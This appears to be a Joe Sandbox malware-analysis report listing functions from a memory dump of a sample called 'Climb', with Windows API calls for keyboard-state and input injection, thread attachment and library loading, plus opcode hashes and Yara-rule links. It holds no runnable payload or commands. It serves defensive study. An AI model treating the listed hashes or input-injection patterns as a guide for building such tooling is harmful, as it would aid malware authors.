Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c5d5b34da23313536d451643b5f620eeded888e404748dec4cd126f0dc21481d
Instruction ID: a11ba167d9f0477ad4877b7bcebd12d2323366d3cec9675a24c567f1228e426e
Opcode Fuzzy Hash: c5d5b34da23313536d451643b5f620eeded888e404748dec4cd126f0dc21481d
Instruction Fuzzy Hash: D6415B39600615DFCF10EF15C585A29BBE2FF99714B088489E94AAF362CB34FC01DB95

Function 0055B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0055B473
SetKeyboardState.USER32(00000080), ref: 0055B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0055B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0055B54F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad129ae28871c564b5dc62b52ada89ea6260ff59093d06f8b5f6b8b2ed5ab6a7
Instruction ID: 1f42c38aa85d27fb8f2903784a1e77d28dba4f1c156242bd2964ea3a23940fba
Opcode Fuzzy Hash: ad129ae28871c564b5dc62b52ada89ea6260ff59093d06f8b5f6b8b2ed5ab6a7
Instruction Fuzzy Hash: 2D313970A40208EEFF348B25882DBFA7FB6BB54312F04421BEC95961D2E375994D9761

Function 0055B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0055B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 0055B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 0055B63B
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0055B68D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2c33e2c9557906b704602ed0f69f1486575c55191e2c8e7ad6ed9d1b56ecaffd
Instruction ID: 086cdf40905f1bc223be678f763402822284b14407d023c188272f18db2339a3
Opcode Fuzzy Hash: 2c33e2c9557906b704602ed0f69f1486575c55191e2c8e7ad6ed9d1b56ecaffd
Instruction Fuzzy Hash: 9F312D30940608AEFF308B65882D7FABFB6BF95312F04422BEC81561D1D374CA4D9B61

Function 005880AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 005880D4
GetWindowRect.USER32(?,?), ref: 0058814A
PtInRect.USER32(?,?,?), ref: 0058815A
MessageBeep.USER32(00000000), ref: 005881C6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 87ba861d2ea7945418ad2fa435537868307b4ddb3cc1b4169c26a3deb353a45e
Instruction ID: cce46bdf4cee264d4bbf90c55b3e1d080da41eccb7fd9d6d701d115d03e44287
Opcode Fuzzy Hash: 87ba861d2ea7945418ad2fa435537868307b4ddb3cc1b4169c26a3deb353a45e
Instruction Fuzzy Hash: 8E418D30A01215DFCB11EF58C888EB9BBF5FF55710F9441A8ED54AB2A1CF70A886DB50

Function 00582176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00582187

Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB

GetCaretPos.USER32(?), ref: 0058219B
ClientToScreen.USER32(00000000,?), ref: 005821E8
GetForegroundWindow.USER32 ref: 005821EE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e7a206146a791c3acd9009b8d5e1868c75f9b23e3cd520e21bca4fd273f56fc6
Instruction ID: f01bca5204f1d13ec9d7a9b8bb54fe1aff63b1d76a1c2f2df96051f57f4ab09c
Opcode Fuzzy Hash: e7a206146a791c3acd9009b8d5e1868c75f9b23e3cd520e21bca4fd273f56fc6
Instruction Fuzzy Hash: 493161B1D0010DAFDB04EFA6C885CAEBBF8FF58308B50846EE915E7211D6759E45CBA0

Function 0055E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF

_wcslen.LIBCMT ref: 0055E8E2
_wcslen.LIBCMT ref: 0055E8F9
_wcslen.LIBCMT ref: 0055E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0055E92F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: a12b86801b97d58e8fedf706f1be5dfcc6c2fc826323f25dbfbe8c25bd39b4bf
Instruction ID: 55b81c4016ccf9d2cf54766db1ddb97a5f567cc231cb8f12832740a8deebe2f4
Opcode Fuzzy Hash: a12b86801b97d58e8fedf706f1be5dfcc6c2fc826323f25dbfbe8c25bd39b4bf
Instruction Fuzzy Hash: BE21D675900215AFDB10AFA8C986BEEBBF8FF85350F104066E804BB281D6749E41CBE1

Function 0058321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005832A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005832C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005832CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005832DC

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: a268fd8ecf442a4f268126ef24fa8e6e0ea2d827272636debac59a319eeebc5b
Instruction ID: d64cdd28dfd73ce54cb2c5510d80bf4aebb50a5c01326f5b51c68e5cc566204a
Opcode Fuzzy Hash: a268fd8ecf442a4f268126ef24fa8e6e0ea2d827272636debac59a319eeebc5b
Instruction Fuzzy Hash: 0821E035204115AFD704AB24C845F6ABBA5FF81724F248258FC26AB2D2C775ED46CBD0

Function 0055825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?), ref: 005596F3
Part of subcall function 005596E4: lstrcpyW.KERNEL32(00000000,?,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 00559719
Part of subcall function 005596E4: lstrcmpiW.KERNEL32(00000000,?,00558271,?,000000FF,?,005590BB,00000000,?,0000001C,?,?), ref: 0055974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 0055828A
lstrcpyW.KERNEL32(00000000,?,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 005582B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,005590BB,00000000,?,0000001C,?,?,00000000), ref: 005582EB

Strings

cdecl, xrefs: 005582E2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: a6c75111d3375765443a3055342c351d3c3a7165743237ed984c35f56728e58b
Instruction ID: a30bf542d3947837ec1b10fd96ba5c38c7b5f37ac6c394bfbb4453e2ad6f1a1b
Opcode Fuzzy Hash: a6c75111d3375765443a3055342c351d3c3a7165743237ed984c35f56728e58b
Instruction Fuzzy Hash: D211E13A200242ABDB14AF38CC59E7A7BE9FF88751B10502BFD02D7290EF319845D7A0

Function 005860FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 0058615A
_wcslen.LIBCMT ref: 0058616C
_wcslen.LIBCMT ref: 00586177
SendMessageW.USER32(?,00001002,00000000,?), ref: 005862B5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: c0f0f29be4f45517414ffe489250a06953c19ab6763d842882ef6e9fce35bcf6
Instruction ID: fbb3b1df69721d2c819fb84f00eaa683a660aa748812aac15502e51e34d848dc
Opcode Fuzzy Hash: c0f0f29be4f45517414ffe489250a06953c19ab6763d842882ef6e9fce35bcf6
Instruction Fuzzy Hash: 06117F75600219AAEB10AF648C89AEE7FBCFB51354F10452AFE11F6082EB70C944DBA0

Function 00522079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79f492b195c12832e14774a78770151d4f343bc06a8cdc4cc5fe6246d932fe2
Instruction ID: 9fa60fe153b4d9eef7f17aa9d572f19df4ad0427deb4f59b95662973e05e33ef
Opcode Fuzzy Hash: c79f492b195c12832e14774a78770151d4f343bc06a8cdc4cc5fe6246d932fe2
Instruction Fuzzy Hash: 5E018FB62096267EF72126787CC8F276B5DFF933B8F300725B521A11D1DE608C409560

Function 00552374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00552394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005523D7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fcf7ba979a1d75596964eb755b21397816320850b72d7e2c0e328bfca3aad3b0
Instruction ID: 001659d0fa75904662d105a5658dab1dc422cd8b4de534dc2f1dd4afa8ccecd7
Opcode Fuzzy Hash: fcf7ba979a1d75596964eb755b21397816320850b72d7e2c0e328bfca3aad3b0
Instruction Fuzzy Hash: F211093A900219FFEF119BA5CD85F9DBBB8FB09750F210492EA01B7290D6716E14DB94

Function 0055EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0055EB14
MessageBoxW.USER32(?,?,?,?), ref: 0055EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0055EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0055EB64

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 1ad3666de4a6854809f7eb7fcb64661de55f3cbd5d9a603ede50259f448e36a0
Instruction ID: b9f1cb6689dd87f2668949741d3cfb62636c36a16db5ddf9950bfe90922fe6f4
Opcode Fuzzy Hash: 1ad3666de4a6854809f7eb7fcb64661de55f3cbd5d9a603ede50259f448e36a0
Instruction Fuzzy Hash: 07110876900258BFC705ABA89C0AE9A7FBDBB55322F104656FC15E32D0D6748A0C97B0

Function 0051D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0051D369,00000000,00000004,00000000), ref: 0051D588
GetLastError.KERNEL32 ref: 0051D594
__dosmaperr.LIBCMT ref: 0051D59B
ResumeThread.KERNEL32(00000000), ref: 0051D5B9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 02665435a5c523ef1e0909bf4d71a35defe4ca157c07fa2d2781f1888da1d0c0
Instruction ID: 5783c7ac229a6bd725fe56615aa05fdb6a7a510aff122796acfe8acbc88962f4
Opcode Fuzzy Hash: 02665435a5c523ef1e0909bf4d71a35defe4ca157c07fa2d2781f1888da1d0c0
Instruction Fuzzy Hash: CC01C4324041157BEB106BA5EC09AEA7F7AFF81335F110219F925961E0DBB19984D7B1

Function 004F7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
GetStockObject.GDI32(00000011), ref: 004F78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 67e57670c7a9cf096369a9269258627e13636a1573398517bcc4eb8ba564035a
Instruction ID: 17bb4a4c879fbba019539f87284481c4fc05a03f0e9a2f17ec0f9d9dadfc3f83
Opcode Fuzzy Hash: 67e57670c7a9cf096369a9269258627e13636a1573398517bcc4eb8ba564035a
Instruction Fuzzy Hash: BE118B7250554DBFEF026F909C58EFA7BA9FF183A4F041116FE01A2160D7399C60EBA0

Function 005233E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue), ref: 00523418
GetLastError.KERNEL32(?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue,00593260,FlsSetValue,00000000,00000364,?,005231B9), ref: 00523424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0052338D,00000364,00000000,00000000,00000000,?,005235FE,00000006,FlsSetValue,00593260,FlsSetValue,00000000), ref: 00523432

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 0d24ac4ff2f6fa056af645ba9899c712583781a611cd96bc65a7a67c1fc03f27
Instruction ID: db6408b4b61bf43097ee3b084577d562272854c00874e77dedd72f14c25db1c6
Opcode Fuzzy Hash: 0d24ac4ff2f6fa056af645ba9899c712583781a611cd96bc65a7a67c1fc03f27
Instruction Fuzzy Hash: DE01B536611232ABCF225A79AC48D563FA8BF26B61B210660F906E31C0D724DA05C6E0

Function 0055BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0055B69A,?,00008000), ref: 0055BAED

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 442fdf7317fe72ef32eee6737e37477c7409ab80bdb90d8038b5397e2a31380c
Instruction ID: b4d6ef3a8c35576710b5cdb4b3c3ea0670ae454552c4ec43fcc6a5c21c2669dc
Opcode Fuzzy Hash: 442fdf7317fe72ef32eee6737e37477c7409ab80bdb90d8038b5397e2a31380c
Instruction Fuzzy Hash: 38117971C00629E7EF00EFA4E95D6EEBFB8BF09712F100486DD41B2280CB309658DBA1

Function 0058886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0058888E
ScreenToClient.USER32(?,?), ref: 005888A6
ScreenToClient.USER32(?,?), ref: 005888CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005888E5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8171b295916f9e5036b8ce96b68a3281f084eabe666b8bed2295edffb45d41ac
Instruction ID: c1dcf8c6acd93be66f8894cdaba1a99e935fa6602653ace7d4927ad40f15fd2a
Opcode Fuzzy Hash: 8171b295916f9e5036b8ce96b68a3281f084eabe666b8bed2295edffb45d41ac
Instruction Fuzzy Hash: 051160B9D0020DAFDB41DFA9C884AEEBBF5FB18310F508166E915E2250E735AA54DF60

Function 005536F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00553712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00553723
GetCurrentThreadId.KERNEL32 ref: 0055372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00553731

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 9ecc0ce379c53b3687d2ea37125902eb0c7a4cf302596360e9353c154f362068
Instruction ID: 5a2bf302834b955a903764bc54a8eaf51ca8d884a9d5c7119b979be4341439f2
Opcode Fuzzy Hash: 9ecc0ce379c53b3687d2ea37125902eb0c7a4cf302596360e9353c154f362068
